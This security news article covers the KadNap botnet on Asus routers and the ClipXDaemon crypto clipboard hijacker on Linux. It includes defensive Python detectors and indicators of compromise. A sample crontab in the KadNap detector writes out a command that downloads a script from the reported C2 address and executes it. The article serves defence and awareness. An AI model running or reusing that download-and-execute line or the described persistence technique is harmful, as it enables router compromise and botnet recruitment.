KadNap Botnet Infects 14,000+ Asus Routers While ClipXDaemon Targets Linux Crypto Wallets

Cybersecurity researchers at the Black Lotus Labs team at Lumen have uncovered a sophisticated new malware strain named KadNap, which has infected over 14,000 edge devices - primarily Asus routers - to build a stealthy proxy botnet. Operating in the wild since August 2025, the botnet leverages a custom Kademlia Distributed Hash Table (DHT) protocol to conceal its command-and-control (C2) infrastructure within a decentralized peer-to-peer (P2P) network. Concurrently, researchers at Cyble have detailed a separate Linux threat dubbed ClipXDaemon, which silently hijacks cryptocurrency transactions in X11 environments.

This dual-threat landscape is critical for network administrators, IT security professionals, and Linux users to understand. By analyzing KadNap's resilient P2P architecture and ClipXDaemon's memory-only execution, defenders can better secure edge networking devices against proxy conscription and protect digital assets from real-time clipboard manipulation.

The Mechanics of the KadNap Botnet

According to the report, more than 60% of KadNap victims are located in the U.S., with additional infections spanning Taiwan, Hong Kong, Russia, the U.K., Australia, Brazil, France, Italy, and Spain. Once a device is compromised, its bandwidth is marketed by a proxy service named Doppelgänger (doppelganger[.]shop). Launched around May or June 2025, Doppelgänger is assessed to be a rebrand of Faceless, a proxy service previously associated with TheMoon malware, claiming to offer "100% anonymity" via resident proxies in over 50 countries.

The infection chain begins with a shell script named "aic.sh" downloaded from the C2 server at 212.104.141[.]140. The script establishes persistence through a cron job that re-downloads it at minute 55 of every hour, saves it as ".asusrouter", and executes it. It then pulls a malicious ELF binary, renames it to "kad", and launches the core KadNap payload, which is built for both ARM and MIPS processors.

To locate peers in its decentralized network, KadNap queries a Network Time Protocol (NTP) server for the current time and combines that value with the host's uptime to derive a hash that identifies other nodes in the DHT. It also uses two helper files, "fwr.sh" and "/tmp/.sose", to close TCP port 22 (the standard Secure Shell port) on the infected device, locking out rival threat actors (and the device's own remote SSH administration) before extracting a list of C2 IP and port combinations.
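The cron persistence and file names described above can be checked for directly. The following is an added example, not code from Lumen's report or from the malware: it scans a crontab dump and a BusyBox-style ps listing for the indicators the write-up names. The "55 * * * *" schedule is an assumption about the exact cron fields (the page gives only the timing), and the sample crontab and process list are constructed, not captures from an infected device.

```python
import os
import re

# Indicators quoted from the write-up above: the reported C2 address, the dropper and
# helper file names, and the names of the dropped files as they appear in a process
# list. "55 * * * *" is the ordinary cron spelling of "minute 55 of every hour"; the
# page gives only the timing, so the exact field layout is an assumption.
KADNAP_C2_IP = "212.104.141.140"
KADNAP_FILES = ("aic.sh", ".asusrouter", "fwr.sh", "/tmp/.sose")
KADNAP_PROCESS_NAMES = {"kad", ".asusrouter"}
CRON_MINUTE_55 = re.compile(r"^55\s+\*\s+\*\s+\*\s+\*\s+")


def scan_crontab(crontab_text):
    """Return (line_no, line, reasons) for every crontab entry matching an indicator."""
    findings = []
    for line_no, raw in enumerate(crontab_text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        reasons = []
        if CRON_MINUTE_55.match(line):
            reasons.append("runs at minute 55 of every hour")
        if KADNAP_C2_IP in line:
            reasons.append("references reported C2 " + KADNAP_C2_IP)
        reasons.extend("references " + name for name in KADNAP_FILES if name in line)
        if reasons:
            findings.append((line_no, line, reasons))
    return findings


def scan_process_list(ps_text):
    """Return (pid, line) for processes whose command line names a KadNap file.

    Expects BusyBox-style 'ps' output with a header row and the PID in the first
    column. Only the basename of each token is compared, so "kad" matches /tmp/kad
    but not an unrelated command that merely contains those letters.
    """
    hits = []
    for raw in ps_text.splitlines()[1:]:  # skip the header row
        fields = raw.split()
        if not fields or not fields[0].isdigit():
            continue
        if any(os.path.basename(tok) in KADNAP_PROCESS_NAMES for tok in fields[1:]):
            hits.append((fields[0], raw.strip()))
    return hits


# Constructed sample input (not a capture from an infected device) so the block runs offline.
SAMPLE_CRONTAB = "\n".join([
    "# constructed sample crontab",
    "0 3 * * * /sbin/logrotate /etc/logrotate.conf",
    "55 * * * * wget -q http://212.104.141.140/aic.sh -O /tmp/.asusrouter && sh /tmp/.asusrouter",
])

SAMPLE_PS = "\n".join([
    "  PID USER       VSZ STAT COMMAND",
    "    1 admin     1280 S    /sbin/init",
    "  812 admin     2048 S    /usr/sbin/httpd",
    " 2117 admin     3312 S    /tmp/kad",
    " 2201 admin     1800 S    sh /tmp/.asusrouter",
])


if __name__ == "__main__":
    for line_no, line, reasons in scan_crontab(SAMPLE_CRONTAB):
        print("crontab line %d: %s\n    %s" % (line_no, line, "; ".join(reasons)))
    for pid, line in scan_process_list(SAMPLE_PS):
        print("suspicious process %s: %s" % (pid, line))
```

On a real device, feed it the output of "crontab -l" (or the files under /var/spool/cron/crontabs on BusyBox-based firmware) and of "ps". A hit on the minute-55 schedule alone is weak evidence; a hit that also names the C2 address or one of the dropped files is the combination worth acting on.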

ClipXDaemon: Hijacking Linux X11 Sessions

While KadNap targets the network edge, a new Linux post-exploitation threat named ClipXDaemon is targeting end users. Delivered via the ShadowHS framework, ClipXDaemon is an autonomous cryptocurrency clipboard hijacker designed specifically for Linux X11 environments. Staged entirely in memory, the malware polls the system clipboard every 200 milliseconds and substitutes copied wallet addresses with attacker-controlled destinations in real time.

The malware supports a wide array of digital assets, specifically targeting Bitcoin, Ethereum, Litecoin, Monero, Tron, Dogecoin, Ripple, and TON wallets. Notably, ClipXDaemon deliberately avoids execution in Wayland sessions. A Wayland compositor only offers the clipboard to the client that currently holds input focus, so a background process cannot read or rewrite it without user-driven interaction; the malware therefore disables itself in these environments to avoid runtime failures and suspicious noise.
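Because ClipXDaemon has no C2 traffic, the observable signal is on the endpoint: an address in the clipboard turning into a different address of the same family within a fraction of a second of being copied. The block below is an added example, not Cyble's code or the malware's: it classifies clipboard text by the eight wallet families listed above, flags a same-family replacement inside a short window (the 1-second default is a heuristic chosen here), and reports whether the current session is the kind the malware targets. The address patterns are shape-only checks and do not validate checksums, the clipboard timeline and addresses are constructed, and which environment variables ClipXDaemon itself inspects is not stated on the page.

```python
import re

# Shape-only patterns (prefix, alphabet, length) for the eight wallet families the
# write-up lists. They do not validate checksums, which is enough for spotting a swap.
BASE58 = r"[1-9A-HJ-NP-Za-km-z]"
ADDRESS_PATTERNS = {
    "Ethereum": re.compile(r"^0x[0-9a-fA-F]{40}$"),
    "Bitcoin":  re.compile(r"^(bc1[a-z0-9]{25,62}|[13]" + BASE58 + r"{25,34})$"),
    "Litecoin": re.compile(r"^(ltc1[a-z0-9]{25,62}|[LM]" + BASE58 + r"{26,33})$"),
    "Monero":   re.compile(r"^[48]" + BASE58 + r"{94}$"),
    "Tron":     re.compile(r"^T" + BASE58 + r"{33}$"),
    "Dogecoin": re.compile(r"^D[5-9A-HJ-NP-U]" + BASE58 + r"{32}$"),
    "Ripple":   re.compile(r"^r" + BASE58 + r"{24,34}$"),
    "TON":      re.compile(r"^[EU]Q[A-Za-z0-9_+/-]{46}$"),
}


def classify(text):
    """Return the wallet family whose address shape `text` matches, or None."""
    candidate = text.strip()
    for family, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(candidate):
            return family
    return None


def detect_swaps(observations, window_s=1.0):
    """Flag clipboard changes that look like a hijack.

    `observations` is a list of (monotonic_seconds, clipboard_text) samples in time
    order. A swap is reported when one sample is a wallet address and the next sample
    is a *different* address of the *same* family that appeared within `window_s`.
    The malware reacts within 200 ms of a copy, so a 1 s window catches it, while a
    user copying two addresses by hand normally takes far longer (heuristic threshold).
    """
    alerts = []
    for (t_prev, v_prev), (t_now, v_now) in zip(observations, observations[1:]):
        family = classify(v_prev)
        same_family = family is not None and classify(v_now) == family
        changed = v_prev.strip() != v_now.strip()
        if same_family and changed and 0 <= t_now - t_prev <= window_s:
            alerts.append({"time": t_now, "family": family,
                           "original": v_prev.strip(), "replacement": v_now.strip()})
    return alerts


def session_exposed(environ):
    """True if the session looks like X11 rather than Wayland.

    WAYLAND_DISPLAY and XDG_SESSION_TYPE are checked before DISPLAY because XWayland
    sets DISPLAY inside Wayland sessions too. These are the usual signals; which ones
    ClipXDaemon itself inspects is not described in the write-up.
    """
    if environ.get("WAYLAND_DISPLAY") or environ.get("XDG_SESSION_TYPE") == "wayland":
        return False
    return bool(environ.get("DISPLAY"))


# Constructed sample addresses and clipboard timeline (not captured data).
ETH_USER = "0x" + "ab12" * 10
ETH_SWAPPED = "0x" + "ff00" * 10
BTC_FIRST = "bc1q" + "a" * 38
BTC_SECOND = "bc1q" + "z" * 38
SAMPLE_OBSERVATIONS = [
    (0.0, "meeting notes for tuesday"),
    (10.0, ETH_USER),
    (10.2, ETH_SWAPPED),   # same family, different address, 200 ms later: the hijack signature
    (30.0, BTC_FIRST),
    (45.0, BTC_SECOND),    # another address 15 s later: ordinary user activity, not flagged
]


if __name__ == "__main__":
    for alert in detect_swaps(SAMPLE_OBSERVATIONS):
        print("possible clipboard hijack at t=%.1fs (%s): %s -> %s"
              % (alert["time"], alert["family"], alert["original"], alert["replacement"]))
```

To run this against a live X11 session, sample the clipboard every few hundred milliseconds with "xclip -o -selection clipboard" (or "xsel -ob"), append (time.monotonic(), text) to the observation list, and call detect_swaps on the tail. The same-family requirement is what keeps the false-positive rate low: a user pasting an Ethereum address and then copying a Bitcoin one is normal, whereas an Ethereum address silently becoming a different Ethereum address 200 ms later is not.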

Threat Comparison Overview

Feature          | KadNap malware                            | ClipXDaemon
Primary target   | Asus routers and edge devices (ARM/MIPS)  | Linux desktop environments (X11)
Core objective   | Build a P2P proxy botnet (Doppelgänger)    | Hijack cryptocurrency wallet addresses
C2 architecture  | Decentralized DHT (Kademlia)               | None (autonomous, no beaconing)
Evasion tactic   | Hides C2 IPs in P2P DHT traffic            | Memory-only staging, avoids Wayland

My Take

The simultaneous rise of KadNap and ClipXDaemon highlights a distinct evolution in how threat actors approach Linux and IoT ecosystems. KadNap's use of a custom DHT protocol to mask its C2 infrastructure demonstrates a shift away from easily blockable centralized servers toward highly resilient, decentralized botnets. By monetizing compromised Asus routers through the Doppelgänger proxy service, attackers are creating a self-sustaining illicit business model. Meanwhile, ClipXDaemon's deliberate avoidance of Wayland sessions shows that modern Linux malware is becoming highly context-aware. The fact that it operates entirely without C2 logic makes it exceptionally difficult for traditional network monitoring tools to detect, emphasizing the urgent need for robust endpoint security and the accelerated adoption of Wayland across Linux distributions.

Frequently Asked Questions

How can I protect my router from the KadNap botnet?

Users operating SOHO routers, particularly Asus models, should apply the latest firmware updates, change default administrative passwords, disable remote management interfaces (WAN-side administration, and SSH unless it is actually needed), and replace any end-of-life hardware that no longer receives security patches. A reboot alone is not a guarantee of removal: after rebooting, confirm that the hourly cron job and the ".asusrouter" and "kad" files are gone, and if they reappear, factory-reset the device and re-flash it from the vendor's firmware image.

Why does ClipXDaemon avoid Wayland sessions?

Wayland's design isolates clipboard access: a compositor only hands clipboard contents to the client that currently holds input focus, so reading it depends on user-driven interaction rather than background polling. ClipXDaemon disables itself in Wayland to avoid triggering errors or alerts, focusing exclusively on the more permissive X11 environments, where any client connected to the display can read and set the selection.

Sources: thehackernews.com ↗